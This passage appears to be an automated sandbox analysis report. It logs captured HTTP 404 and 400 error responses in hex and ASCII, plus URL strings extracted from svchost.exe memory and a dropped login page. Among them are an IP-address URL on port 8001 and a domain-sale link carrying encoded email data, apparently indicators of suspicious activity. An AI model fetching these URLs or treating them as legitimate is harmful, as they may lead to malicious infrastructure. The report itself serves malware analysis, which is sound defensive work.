Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:43:07 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:43:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:43:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:43:37 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:43:38 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:43:48 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 33 3a 34 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:43:49 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 33 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:44:05 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:44:06 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: svchost.exe, 00000002.00000003.3004451306.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3270757925.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html
Source: svchost.exe, 00000002.00000003.3004451306.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188535338.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3271693742.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com
Source: svchost.exe, 00000002.00000002.3272590154.0000000002B12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com0
Source: svchost.exe, 00000002.00000002.3272590154.0000000002B12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comhttp://106.15.137.66:8001/dh/
Source: svchost.exe, 00000002.00000003.3004451306.00000000008F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.htmlindex8?d=lyrysor.com
Source: login[2].htm1.2.dr	String found in binary or memory: http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&
Source: svchost.exe, 0000000E.00000003.2559787764.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3273166153.0000017E5C394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2568836283.0000017E5C378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000000E.00000002.3272292196.0000017E5BB02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS</ds:KeyName>&lt
Source: svchost.exe, 0000000E.00000002.3273703225.0000017E5CA6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS</ds:KeyName></ds:KeyInfo><CipherDat
Source: svchost.exe, 0000000E.00000003.2663854848.0000017E5C378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000000E.00000003.2697887745.0000017E5CABB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 0000000E.00000002.3273809530.0000017E5CAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 0000000E.00000003.2559787764.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2568836283.0000017E5C378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tbA
Source: svchost.exe, 0000000E.00000002.3271960593.0000017E5BAB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 0000000E.00000002.3273209037.0000017E5CA00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000E.00000003.2679979022.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663768290.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663768290.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2
Source: svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
